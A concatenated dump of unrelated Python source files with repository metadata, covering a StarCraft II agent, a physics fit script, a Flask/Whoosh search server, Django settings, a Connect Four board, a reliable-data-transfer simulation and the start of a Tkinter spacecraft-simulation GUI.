print(vowel)
| [
"s.matthew.english@gmail.com"
] | s.matthew.english@gmail.com |
98d75dde25a21b1325e302fb99136e29ebb46c53 | c22b511dfa356330ba2e90ee098c929580d18543 | /UnitLog/simple_agent.py | cd41978e67bf0018ec2e008c1d63fbbb0464b4e7 | [] | no_license | malinipathakota/Dynamic-Army-Prediction | 735ce09115223b872bb474fbcdd09065992014eb | 31cdf2029a15bb0e098309aa877d0b854ca7c4d1 | refs/heads/master | 2020-03-22T02:04:22.037907 | 2018-06-08T17:59:17 | 2018-06-08T17:59:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,449 | py | from pysc2.agents import base_agent
from pysc2.lib import actions
from pysc2.lib import features
import math
import time
# This program tells the amount of supply depots there are on the current screen using pysc2
# basic code from https://chatbotslife.com/building-a-basic-pysc2-agent-b109cde1477c
# Functions -- pysc2 action ids used by this agent
_BUILD_SUPPLYDEPOT = actions.FUNCTIONS.Build_SupplyDepot_screen.id
_NOOP = actions.FUNCTIONS.no_op.id
_SELECT_POINT = actions.FUNCTIONS.select_point.id
# Features -- screen feature-layer indexes
_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index
_UNIT_TYPE = features.SCREEN_FEATURES.unit_type.index
# Unit IDs (Terran)
_TERRAN_COMMANDCENTER = 18
_TERRAN_SUPPLYDEPOT = 19
_TERRAN_SCV = 45
# Parameters
_PLAYER_SELF = 1    # player_relative value marking our own units
_NOT_QUEUED = [0]   # execute the action immediately
_QUEUED = [1]       # queue after current orders (appears unused here)
class SimpleAgent(base_agent.BaseAgent):
    """Scripted agent: counts on-screen supply depots, then has an SCV build one."""
    # Which corner the base spawned in; decided on the first step() call.
    base_top_left = None
    # One-shot flags so we select the SCV / place the depot only once.
    supply_depot_built = False
    scv_selected = False
def transformLocation(self, x, x_distance, y, y_distance):
if not self.base_top_left:
return [x - x_distance, y - y_distance]
return [x + x_distance, y + y_distance]
def step(self, obs):
super(SimpleAgent, self).step(obs)
time.sleep(0.5)
_UNIT_TYPE = features.SCREEN_FEATURES.unit_type.index
unit_type = obs.observation['screen'][_UNIT_TYPE]
depot_y, depot_x = (unit_type == _TERRAN_SUPPLYDEPOT).nonzero()
#69 pixels in 1 depot
depot_count = int(math.ceil(len(depot_y) / 69))
print("There are " , depot_count , " depots")
if self.base_top_left is None:
player_y, player_x = (obs.observation["minimap"][_PLAYER_RELATIVE] == _PLAYER_SELF).nonzero()
self.base_top_left = player_y.mean() <= 31
if not self.supply_depot_built:
if not self.scv_selected:
unit_type = obs.observation["screen"][_UNIT_TYPE]
unit_y, unit_x = (unit_type == _TERRAN_SCV).nonzero()
target = [unit_x[0], unit_y[0]]
self.scv_selected = True
return actions.FunctionCall(_SELECT_POINT, [_NOT_QUEUED, target])
elif _BUILD_SUPPLYDEPOT in obs.observation["available_actions"]:
unit_type = obs.observation["screen"][_UNIT_TYPE]
unit_y, unit_x = (unit_type == _TERRAN_COMMANDCENTER).nonzero()
target = self.transformLocation(int(unit_x.mean()), 0, int(unit_y.mean()), 20)
self.supply_depot_built = True
return actions.FunctionCall(_BUILD_SUPPLYDEPOT, [_NOT_QUEUED, target])
return actions.FunctionCall(actions.FUNCTIONS.no_op.id, []) | [
"noreply@github.com"
] | malinipathakota.noreply@github.com |
bf7cccfc45cdf2461987920d5a0b5fcb107fe227 | 5488617b1b05c436b1f8c8642ea75ca754719f8d | /TW_study/LimitCode/tW_measurment/mlfitNormsToText.py | 7cbfc9933869090ddc8caf40ffac104930662672 | [] | no_license | wenxingfang/TW_Top | fdb1ba136be6ace8fdacaade58cb4ca4fcdc3c9e | 389e76c904d08a59d9141b9b66ec15d2583f8e9a | refs/heads/master | 2021-02-05T06:54:27.908688 | 2020-02-28T13:24:00 | 2020-02-28T13:24:00 | 243,754,087 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,037 | py | import re
from sys import argv, stdout, stderr, exit
# import ROOT with a fix to get batch mode (http://root.cern.ch/phpBB3/viewtopic.php?t=3198)
argv.append( '-b-' )
import ROOT
ROOT.gROOT.SetBatch(True)
argv.remove( '-b-' )
# NOTE(review): argv always contains at least the script name, so this
# "no arguments" check can never fire; it likely should be len(argv) < 2.
if len(argv) == 0: raise RuntimeError, "Usage: mlfitNormsToText.py [ -u ] mlfit.root";
# -u flag: also print the fitted uncertainties.
errors = False
if len(argv) > 2 and argv[1] == "-u":
    errors = True
    argv[1] = argv[2];
# Open the MaxLikelihoodFit output and fetch the three normalization sets.
# NOTE(review): `file` and `iter` below shadow Python builtins.
file = ROOT.TFile.Open(argv[1]);
prefit = file.Get("norm_prefit")
fit_s = file.Get("norm_fit_s")
fit_b = file.Get("norm_fit_b")
if prefit == None: stderr.write("Missing fit_s in %s. Did you run MaxLikelihoodFit in a recent-enough version of combine and with --saveNorm?\n" % file);
if fit_s == None: raise RuntimeError, "Missing fit_s in %s. Did you run MaxLikelihoodFit with --saveNorm?" % file;
if fit_b == None: raise RuntimeError, "Missing fit_b in %s. Did you run MaxLikelihoodFit with --saveNorm?" % file;
iter = fit_s.createIterator()
# Walk the s+b fit normalizations; for each, print bin and process names
# plus the pre-fit / s+b-fit / b-only-fit values (with errors if -u).
while True:
    norm_s = iter.Next()
    if norm_s == None: break;
    norm_b = fit_b.find(norm_s.GetName())
    norm_p = prefit.find(norm_s.GetName()) if prefit else None
    # Object names look like "bin/proc" or "n_exp_[final_]bin<bin>_proc_<proc>".
    m = re.match(r"(\w+)/(\w+)", norm_s.GetName());
    if m == None: m = re.match(r"n_exp_(?:final_)?(?:bin)+(\w+)_proc_(\w+)", norm_s.GetName());
    if m == None: raise RuntimeError, "Non-conforming object name %s" % norm_s.GetName()
    if norm_b == None: raise RuntimeError, "Missing normalization %s for background fit" % norm_s.GetName()
    if prefit and norm_p and errors:
        print "%-30s %-30s %7.3f +/- %7.3f %7.3f +/- %7.3f %7.3f +/- %7.3f" % (m.group(1), m.group(2), norm_p.getVal(), norm_p.getError(), norm_s.getVal(), norm_s.getError(), norm_b.getVal(), norm_b.getError())
    else:
        if errors:
            print "%-30s %-30s %7.3f +/- %7.3f %7.3f +/- %7.3f" % (m.group(1), m.group(2), norm_s.getVal(), norm_s.getError(), norm_b.getVal(), norm_b.getError())
        else:
            print "%-30s %-30s %7.3f %7.3f" % (m.group(1), m.group(2), norm_s.getVal(), norm_b.getVal())
| [
"wenxing.fang@cern.ch"
] | wenxing.fang@cern.ch |
3457167f9bc213fb29f4f31b0efb6fcb0b083d73 | 593801aa67c0d804836eb064fdffce1da7be1f1c | /server.py | 7f6d86f84e9d5d80e6d591f9c5af930c6efab6de | [] | no_license | tzembo/la-gregueria-virtual | bd91c29d966ae6fd015eca356b53348cff2a1e00 | 3ea50e7c83f22eb3ce1648e98fa1882eead0da82 | refs/heads/master | 2019-07-18T13:53:59.876636 | 2018-06-21T22:54:58 | 2018-06-21T22:54:58 | 116,059,695 | 2 | 1 | null | 2018-06-18T22:41:14 | 2018-01-02T21:38:26 | Python | UTF-8 | Python | false | false | 4,645 | py | # server.py
import os
import urllib
import signal
from werkzeug.contrib.fixers import ProxyFix
from pymongo import MongoClient
from bson.objectid import ObjectId
from flask import Flask, render_template, jsonify, json, request, Response
from flask_cors import CORS
from collections import Counter
from whoosh.index import open_dir
from whoosh.query import Term, Every, NumericRange
from whoosh.qparser import QueryParser, OrGroup
from whoosh.analysis import LanguageAnalyzer
from whoosh.highlight import Formatter, get_text, WholeFragmenter
# Serve the compiled React app from the build/ directory.
app = Flask(__name__, static_folder="build", template_folder="build")
CORS(app)  # allow cross-origin API requests from the frontend
app.wsgi_app = ProxyFix(app.wsgi_app)  # honor X-Forwarded-* headers behind a reverse proxy
# connect to MongoDB database
# client = MongoClient('localhost:27017')
# db = client.GregueriasData
# customize highlight formatter
class HighlightFormatter(Formatter):
    """Whoosh highlight formatter that wraps matched terms in <mark> markers."""
    def format_token(self, text, token, replace=False):
        # Use the get_text function to get the text corresponding to the
        # token
        tokentext = get_text(text, token, replace)
        # Return the text as you want it to appear in the highlighted
        # string.
        # NOTE(review): the closing marker is "<mark>", not "</mark>" —
        # confirm whether the frontend splits on this delimiter or expects
        # valid HTML; if the latter, this is a bug.
        return "<mark>%s<mark>" % tokentext
hf = HighlightFormatter() # formatter for highlighting
wf = WholeFragmenter() # fragmenter that highlights over the whole text (no snippets)
es_ana = LanguageAnalyzer("es") # Whoosh analyzer for Spanish (appears unused in this module)
# Load Whoosh index
index = open_dir("whoosh_index")
# Initialize Whoosh parser over the "text" field
parser = QueryParser("text", schema=index.schema)
@app.route("/")
def load_index():
return render_template("index.html")
@app.route("/api/greguerias/all/", methods=['GET'])
def get_all_greguerias():
try:
results_list = []
q = Every() # Whoosh query for returning all items
with index.searcher() as searcher:
results = searcher.search(q, limit=None)
for hit in results:
result_item = {
"id": hit["id"],
"text": hit["text"],
"tags": hit["tags"],
"wc": hit["wc"],
"x": hit["x"],
"y": hit["y"]
}
results_list.append(result_item)
except Exception as e:
return str(e)
else:
return jsonify({"results": results_list})
@app.route("/api/greguerias", methods=['GET'])
def search():
query = []
fulltext = request.args.get('fulltext')
if fulltext:
query.append(urllib.parse.unquote(fulltext))
wcmin = request.args.get('wcmin', '')
wcmax = request.args.get('wcmax', '')
if wcmin or wcmax:
if (wcmin):
wcmin = wcmin + ' '
if (wcmax):
wcmax = ' ' + wcmax
query.append("wc:[{}TO{}]".format(wcmin, wcmax))
tags = request.args.get('tags')
if tags:
parsed_tags = tags.split(',')
query.append("tags:(" + ' '.join(parsed_tags) + ")")
print(' '.join(query))
q = parser.parse(' '.join(query))
with index.searcher() as searcher:
results = searcher.search(q, limit=None)
results.fragmenter = wf
results.formatter = hf
results_list = []
print(q)
for hit in results:
print(hit.highlights("text"))
result_item = {
"id": hit["id"],
"text": hit.highlights("text"),
"tags": hit["tags"],
"wc": hit["wc"],
"x": hit["x"],
"y": hit["y"]
}
results_list.append(result_item)
print(results_list)
return jsonify({"results": results_list})
@app.route('/api/gregueria/<gregueria_id>', methods=['GET'])
def get_gregueria_by_id(gregueria_id):
    """Return one gregueria's stored fields plus similar items (more-like-this)."""
    try:
        sim_list = []
        with index.searcher() as searcher:
            # Resolve the internal document number for this id, then read
            # its stored fields and ask Whoosh for similar documents.
            docnum = searcher.document_number(id=gregueria_id)
            result = searcher.stored_fields(docnum)
            similar_results = searcher.more_like(docnum, "text")
            for hit in similar_results:
                sim_item = {
                    "id": hit["id"],
                    "text": hit["text"],
                    "tags": hit["tags"],
                    "wc": hit["wc"]
                }
                sim_list.append(sim_item)
        ret = {"gregueria": result, "similar_greguerias": sim_list}
    except Exception as e:
        # Mirror the module's error convention: return the message as text.
        return str(e)
    return jsonify(ret)
@app.route('/<path:path>')
def catch_all(path):
    """SPA fallback: serve index.html for any unmatched path (client routing)."""
    return render_template("index.html")
if __name__ == "__main__":
app.run(host='0.0.0.0')
| [
"tzembowicz@gmail.com"
] | tzembowicz@gmail.com |
198b5ae58b68d8062d33db60461450c901fe992a | 801d00870b888b6905423071c0bdf79f0847242e | /swiftst/consts.py | 65265b70edfbd36b896b7ee4ac7bc223b6dee925 | [
"Apache-2.0"
] | permissive | btorch/swift-setuptools | de297810d7227f24eef61054cfdd94cf8684252a | 15e6e134a00b2ce70456a19e938e1b9d696a3762 | refs/heads/master | 2021-11-30T04:01:26.544397 | 2013-05-09T20:56:21 | 2013-05-09T20:56:21 | 9,222,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,352 | py | """ See COPYING for license information. """
'''
Some parameters that are passed over on apt-get installs
'''
# NOTE(review): --force-yes is deprecated in newer apt versions — confirm
# the target distributions before relying on it.
apt_opts = ' -y -qq --force-yes -o Dpkg::Options::=--force-confdef '
'''
Keyring packages that might be needed
'''
keyrings = ['ubuntu-cloud-keyring']
'''
Utilities that will be install on all systems by the common setup
'''
general_tools = ['python-software-properties', 'patch', 'debconf',
                 'bonnie++', 'dstat', 'python-configobj', 'curl',
                 'subversion', 'git-core', 'iptraf', 'htop', 'syslog-ng',
                 'nmon', 'strace', 'iotop', 'debsums', 'python-pip',
                 'snmpd', 'snmp', 'bsd-mailx', 'xfsprogs', 'ntp',
                 'snmp-mibs-downloader', 'exim4']
'''
Dictionary that contains system:packages that will be installed
for swift according to each system functionality
'''
# 'saio' = Swift All In One (proxy + storage on a single node).
packages = {'generic': ['swift', 'python-swift', 'python-swiftclient'],
            'proxy': ['swift-proxy', 'python-keystone',
                      'python-keystoneclient', 'memcached', 'python-memcache'],
            'storage': ['swift-account', 'swift-container', 'swift-object'],
            'saio': ['swift-proxy', 'swift-account', 'swift-container',
                     'swift-object', 'python-keystone',
                     'python-keystoneclient', 'memcached',
                     'python-memcache'],
            'other': ['python-suds', 'python-slogging']
            }
'''
This is a dictionary that matches the template files that have
placeholders with the keywords that need to be replacted by what
has been set in the configuration file. The keywords below must
match the keys in the configuration file. The only difference is
that they will be lowecase in the configuration file.
'''
templates = {'common/etc/aliases': ('EMAIL_ADDR', 'PAGER_ADDR'),
             'common/etc/exim4/update-exim4.conf.conf': ('OUTGOING_DOMAIN',
                                                         'SMARTHOST'),
             'common/etc/cron.d/swift_ring_check': ('RINGSERVER_IP', ),
             'common/etc/swift/swift.conf': ('SWIFT_HASH', ),
             'common/etc/syslog-ng/conf.d/swift-syslog-ng.conf': ('SYSLOGS_IP', ),
             'proxy/etc/memcached.conf': ('MEMCACHE_MAXMEM', 'SIM_CONNECTIONS'),
             'proxy/etc/swift/memcache.conf': ('MEMCACHE_SERVER_LIST', ),
             'proxy/etc/swift/proxy-server.conf': ('KEYSTONE_IP',
                                                   'KEYSTONE_PORT',
                                                   'KEYSTONE_AUTH_PROTO',
                                                   'KEYSTONE_AUTH_URI',
                                                   'KEYSTONE_ADMIN_TENANT',
                                                   'KEYSTONE_ADMIN_USER',
                                                   'KEYSTONE_ADMIN_KEY',
                                                   'INFORMANT_IP'),
             'admin/etc/swift/dispersion.conf': ('KEYSTONE_AUTH_URI',
                                                 'KEYSTONE_ADMIN_TENANT',
                                                 'KEYSTONE_ADMIN_USER',
                                                 'KEYSTONE_ADMIN_KEY'),
             'storage/usr/local/bin/drive_mount_check.py': ('OUTGOING_DOMAIN',
                                                            'EMAIL_ADDR')}
| [
"btorch@gmail.com"
] | btorch@gmail.com |
94d670a97b05e7dffb5001190db431bae350249c | 11c423e8db58794e6c4b27526914b0edf3d20691 | /Favorite Movie.py | d2ea33237dd2374e6ca148695cc13fd5fb1bf422 | [] | no_license | FrantzL-Cyber/Unit_1 | 29adcedc4828184799628cf8f4633d6cefe4fef6 | 7426e4ebbf57b4398f7c0f961f53af28d14b77a7 | refs/heads/master | 2020-08-11T12:25:47.454492 | 2019-10-12T02:41:08 | 2019-10-12T02:41:08 | 214,564,743 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | fav = input("What is your favorite movie?")
def favorite_movie(n):
print("Wow my favorite movie is also " + n)
favorite_movie(fav)
| [
"noreply@github.com"
] | FrantzL-Cyber.noreply@github.com |
890a6c845ba68e91d44b1354ba3d62efa680e5ae | 890eee7b41d555c6e05ee28fb52ecb281bbde7fb | /HW10/hw10pr2.py | 43577999684613be97ea0f6fead483b5b37b62d6 | [] | no_license | Austin-Long/CS5 | e42e0f154122967150a1eb4112d9aaadd39a59b2 | 92a98ae59a02050a707ed514389560ca26cf6b97 | refs/heads/master | 2020-03-28T08:23:46.405771 | 2018-12-17T04:16:38 | 2018-12-17T04:16:38 | 147,895,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,393 | py | #
# hw10pr2.py
#
# Name: Austin Long
#
def inarow_Neast(ch, r_start, c_start, A, N):
"""Starting from (row, col) of (r_start, c_start)
within the 2d list-of-lists A (array),
returns True if there are N ch's in a row
heading east and returns False otherwise.
"""
H = len(A)
W = len(A[0])
if r_start < 0 or r_start > H - 1:
return False # out of bounds row
if c_start < 0 or c_start + (N-1) > W - 1:
return False # o.o.b. col
# loop over each location _offset_ i
for i in range(N):
if A[r_start][c_start+i] != ch: # a mismatch!
return False
return True # all offsets succeeded, so we return True
def inarow_Nsouth(ch, r_start, c_start, A, N):
"""Starting from (row, col) of (r_start, c_start)
within the 2d list-of-lists A (array),
returns True if there are N ch's in a row
heading south and returns False otherwise.
"""
H = len(A)
W = len(A[0])
if r_start < 0 or r_start + (N-1) > H - 1:
return False # out of bounds row
if c_start < 0 or c_start > W - 1:
return False # o.o.b. col
# loop over each location _offset_ i
for i in range(N):
if A[r_start+i][c_start] != ch: # a mismatch!
return False
return True # all offsets succeeded, so we return True
def inarow_Nnortheast(ch, r_start, c_start, A, N):
"""Starting from (row, col) of (r_start, c_start)
within the 2d list-of-lists A (array),
returns True if there are N ch's in a row
heading northeast and returns False otherwise.
"""
H = len(A)
W = len(A[0])
if r_start - (N-1) < 0 or r_start > H - 1:
return False # out of bounds row
if c_start < 0 or c_start + (N-1) > W - 1:
return False # o.o.b. col
# loop over each location _offset_ i
for i in range(N):
if A[r_start-i][c_start+i] != ch: # a mismatch!
return False
return True # all offsets succeeded, so we return True
def inarow_Nsoutheast(ch, r_start, c_start, A, N):
"""Starting from (row, col) of (r_start, c_start)
within the 2d list-of-lists A (array),
returns True if there are N ch's in a row
heading southeast and returns False otherwise.
"""
H = len(A)
W = len(A[0])
if r_start < 0 or r_start + (N-1) > H - 1:
return False # out of bounds row
if c_start < 0 or c_start + (N-1) > W - 1:
return False # o.o.b. col
# loop over each location _offset_ i
for i in range(N):
if A[r_start+i][c_start+i] != ch: # a mismatch!
return False
return True # all offsets succeeded, so we return True
class Board:
"""A data type representing a Connect-4 board
with an arbitrary number of rows and columns.
"""
def __init__(self, width, height):
"""Construct objects of type Board, with the given width and height."""
self.width = width
self.height = height
self.data = [[' ']*width for row in range(height)]
# We do not need to return anything from a constructor!
def __repr__(self):
"""This method returns a string representation
for an object of type Board.
"""
s = '' # the string to return
for row in range(0, self.height):
s += '|'
for col in range(0, self.width):
s += self.data[row][col] + '|'
s += '\n'
s += (2*self.width + 1) * '-' # bottom of the board
# and the numbers underneath here
return s # the board is complete, return it
def addMove(self, col, ox):
"""Drops a check into the board, accepts two arguments:
the col and the one character string 'X' or 'O'
"""
for i in range(self.height):
if self.data[i][col] != " ":
self.data[i-1][col] = ox
return
self.data[self.height-1][col] = ox
def clear(self):
"""clears the board that calls it"""
for row in range(self.height):
self.data =[" "]*self.width
def setBoard(self, moveString):
"""Accepts a string of columns and places
alternating checkers in those columns,
starting with 'X'.
For example, call b.setBoard('012345')
to see 'X's and 'O's alternate on the
bottom row, or b.setBoard('000000') to
see them alternate in the left column.
moveString must be a string of one-digit integers.
"""
nextChecker = 'X' # start by playing 'X'
for colChar in moveString:
col = int(colChar)
if 0 <= col <= self.width:
self.addMove(col, nextChecker)
if nextChecker == 'X':
nextChecker = 'O'
else:
nextChecker = 'X'
def allowsMove(self, c):
"""returns True if the calling object does allow a move into column c
Returns False if c is not a legal column number, and if c is full
"""
if c < 0 or c >= self.width:
return False
elif self.data[0][c] != " ":
return False
else:
return True
def isFull(self):
"""returns True if the calling object is completely full of checkers. False
otherwise
"""
for c in range(self.width):
if self.allowsMove(c) == True:
return False
return True
def delMove(self, c):
"""removes the top checker from the column c, if the column is empty, then
do nothing
"""
for i in range(self.height):
if self.data[i][c] != " ":
self.data[i][c] = " "
return
def winsFor(self, ox):
"""returns True if there are four checkers of type ox in a row on the
board, False otherwise
Accepts: a 1-character checker, either 'O' or 'X'
"""
for i in range(self.height):
for j in range(self.width):
if inarow_Neast(ox, i, j, self.data, 4) or \
inarow_Nnortheast(ox, i, j, self.data, 4) or \
inarow_Nsouth(ox, i, j, self.data, 4) or \
inarow_Nsoutheast(ox, i, j, self.data, 4):
return True
return False
def hostGame(self):
"""hosts a game of connect for, 'X' will always go first"""
print("Welcome to Connect Four! \n")
print(self)
a = 1
b = 1
while a == b:
users_col = -1
while not self.allowsMove(users_col):
users_col = int(input("Choose a column(X): "))
self.addMove(users_col, 'X')
print(self)
if self.winsFor('X'):
print("Player X gets the Win!")
return
if self.isFull():
print('tie')
return
users_col = -1
while not self.allowsMove(users_col):
users_col = int(input("Choose a column(O): "))
self.addMove(users_col, 'O')
print(self)
if self.winsFor('O'):
print('Player O Wins!')
return
if self.isFull():
print('tie')
return
| [
"austinlong@MacBook-Pro-71.local"
] | austinlong@MacBook-Pro-71.local |
1f4f463c6c68e936a859a188ff56cc5981359f27 | af70590e2e8d75f6db76715bfe6f09f4334c25e6 | /app/src/domains/auth/model/auth.py | 805b868353ed4948730d03dd3eaa478a9f01bc14 | [] | no_license | gfpaiva/wishlist-api | 6c3472cfc84bc8da43b60c948f1b1a72d5711aca | 41aa43a7b1f182836cc40e5be9a68c565a748893 | refs/heads/main | 2023-01-22T07:59:34.856988 | 2020-12-07T02:18:12 | 2020-12-07T02:18:12 | 306,745,071 | 0 | 0 | null | 2020-12-07T02:18:14 | 2020-10-23T20:54:51 | Python | UTF-8 | Python | false | false | 412 | py | from peewee import (
Model,
CharField,
)
from src.infra.db import db
class Auth(Model):
"""
Model for user/app authentication in database. With fields id, username
and password
"""
id = CharField(primary_key=True, null=False)
username = CharField(null=False, unique=True)
password = CharField(null=False)
class Meta:
table_name = 'auths'
database = db
| [
"gf.paiva@yahoo.com.br"
] | gf.paiva@yahoo.com.br |
6b2724dbc3431852c9166f9410166bac898f52e3 | feb7437e96a24893b3473e24fbba075681f3c605 | /flightproject/flightproject/settings.py | 8cc0b5f1b6707c50408a8ea867682ca1a568aad7 | [] | no_license | msatyam832/Flight-Reservation-System | 01a8aaa8743e6407d353cf9a35c719e6a198b363 | 1847bf3715dd937df46568afc357930c6913568c | refs/heads/master | 2023-02-24T08:49:30.640620 | 2021-02-01T06:33:32 | 2021-02-01T06:33:32 | 330,865,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,242 | py | """
Django settings for flightproject project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'nhu^s8t4%i-xi5lkl9b=)6w3y17$6+g)1v$7e_%ad^e=9@cssr'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'flightapp',
'rest_framework'
,
]
REST_FRAMEWORK={
'DEFAULT_PAGINATION_CLASS':'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE':2
}
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'flightproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'flightproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| [
"satyamkumar@univisiontechnocon.com"
] | satyamkumar@univisiontechnocon.com |
234f9d0be069bd885e1b1e25db82bd2eb4e0e97e | d765d19f80a6bfed71685838306f2d91f6a5a7dd | /rdt/rdt21.py | 0c2bba984d0b3daf478d990edda454a24d739487 | [] | no_license | EliasFarhan/CompNet | 1f1f83e6babdb688e1d626117cdb50a642a9d2a9 | c95b36c12a7a0a0d0ac5ecdb41e1b227c3973de0 | refs/heads/master | 2021-07-16T20:33:56.803384 | 2020-09-15T18:54:18 | 2020-09-15T18:54:18 | 210,541,643 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,839 | py | from rdt.base import *
from rdt.rdt20 import ChannelRdt20
class SenderRdt21(Sender):
last_packet = ""
sequence_nmb = 1
msg_lock = threading.Lock()
def send_data(self, data, resend=False):
if not resend:
self.msg_lock.acquire()
self.last_packet = data
text_data = data.encode()
packet = bytearray(len(text_data) + 2)
packet[1] = self.sequence_nmb.to_bytes(8, byteorder='little')[0]
check_sum = 0
for byte in text_data:
check_sum += byte
check_sum += packet[1]
packet[0] = check_sum.to_bytes(8, byteorder="little")[0]
packet[2:len(text_data) + 2] = text_data
self.channel.send_msg(packet)
def receive_response(self, response):
check_sum = 0
for byte in response[0:2]:
check_sum += byte
if check_sum.to_bytes(8, byteorder='little')[0] != response[3]:
print("[Error] Bad response checksum : need to send the last packet again: "+self.last_packet)
self.send_data(self.last_packet, resend=True)
return
if b"ACK" in response:
print("[ACK] Packet went well")
self.sequence_nmb += 1
self.msg_lock.release()
elif b"NAK" in response:
print("[NAK] Need to send packet again")
self.send_data(self.last_packet, resend=True)
else:
print("[Error] Bad response : need to send the last packet again")
self.send_data(self.last_packet, resend=True)
class ReceiverRdt21(Receiver):
sequence_number = 0
def receive_data(self, data):
check_sum = data[0]
sequence_nmb = data[1]
text_data = data[2:]
byte_sum = 0
response = bytearray(4)
for byte in text_data:
byte_sum += byte
byte_sum += sequence_nmb
if byte_sum.to_bytes(8, byteorder="little")[0] == check_sum:
if self.sequence_number != sequence_nmb:
super().receive_data(text_data)
self.sequence_number = sequence_nmb
response[0:2] = b"ACK"
byte_sum = 0
for byte in response[0:2]:
byte_sum += byte
response[3] = byte_sum.to_bytes(8, byteorder='little')[0]
self.send_response(response)
else:
response[0:2] = b"NAK"
byte_sum = 0
for byte in response[0:2]:
byte_sum += byte
response[3] = byte_sum.to_bytes(8, byteorder='little')[0]
self.send_response(response)
def send_response(self, response):
super().send_response(response)
def main():
sim = Simulation(sender=SenderRdt21(), channel=ChannelRdt20(), receiver=ReceiverRdt21())
sim.simulate()
if __name__ == "__main__":
main()
| [
"elias.farhan@gmail.com"
] | elias.farhan@gmail.com |
901c2725f19e802f0cfd00ad38118bb3d1511a0c | 6490638f15a2dfbe0cec9725186f9784d57c92f0 | /SPACEUI/SPACEgui.py | 18a2f4d304f7717a4741a891fc0f833466a08ac4 | [
"MIT"
] | permissive | khawatkom/SpacePyLibrary | af9c490ef796b9d37a13298c41df1fb5bf6b3cee | c94415e9d85519f345fc56938198ac2537c0c6d0 | refs/heads/master | 2020-05-14T21:52:39.388979 | 2019-04-17T17:06:04 | 2019-04-17T17:06:04 | 181,970,668 | 1 | 0 | null | 2019-04-17T21:26:44 | 2019-04-17T21:26:44 | null | UTF-8 | Python | false | false | 33,911 | py | #******************************************************************************
# (C) 2018, Stefan Korner, Austria *
# *
# The Space Python Library is free software; you can redistribute it and/or *
# modify it under under the terms of the MIT License as published by the *
# Massachusetts Institute of Technology. *
# *
# The Space Python Library is distributed in the hope that it will be useful, *
# but WITHOUT ANY WARRANTY; without even the implied warranty of *
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the MIT License *
# for more details. *
#******************************************************************************
# Space Segment Simulation GUI *
#******************************************************************************
import tkinter
from tkinter import filedialog, simpledialog
from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR
import SCOS.ENV
import SPACE.IF
import UI.TKI
import UTIL.TIME
#############
# constants #
#############
# widget color scheme (hex RGB values)
COLOR_BUTTON_FG = "#FFFFFF"    # menu button text: white
COLOR_BUTTON_BG = "#808080"    # menu button background: grey
COLOR_INITIALISED = "#FFFF00"  # TM status field right after startup: yellow
COLOR_CONNECTED = "#00FF00"    # green; presumably set when the TM link is up - confirm in notifyStatus
COLOR_ON_OK = "#00FF00"        # checkbutton color for positive options (TM, ACKn): green
COLOR_ON_NOK = "#FF0000"       # checkbutton color for negative options (NAKn): red
###########
# classes #
###########
# =============================================================================
class TMpacketDetails(tkinter.Frame, UI.TKI.AppGrid):
"""Displays the packet details, implemented as tkinter.Frame"""
# ---------------------------------------------------------------------------
def __init__(self, master):
tkinter.Frame.__init__(self, master, relief=tkinter.GROOVE, borderwidth=1)
# --- filler ---
filler = tkinter.Label(self)
self.appGrid(filler, row=0, columnspan=2, rowweight=0)
# packet name
self.pktNameField = UI.TKI.ValueField(self, row=1, label="Packet name:")
# packet description
self.pktDescrField = UI.TKI.ValueField(self, row=2, label="Packet description:")
# SPID
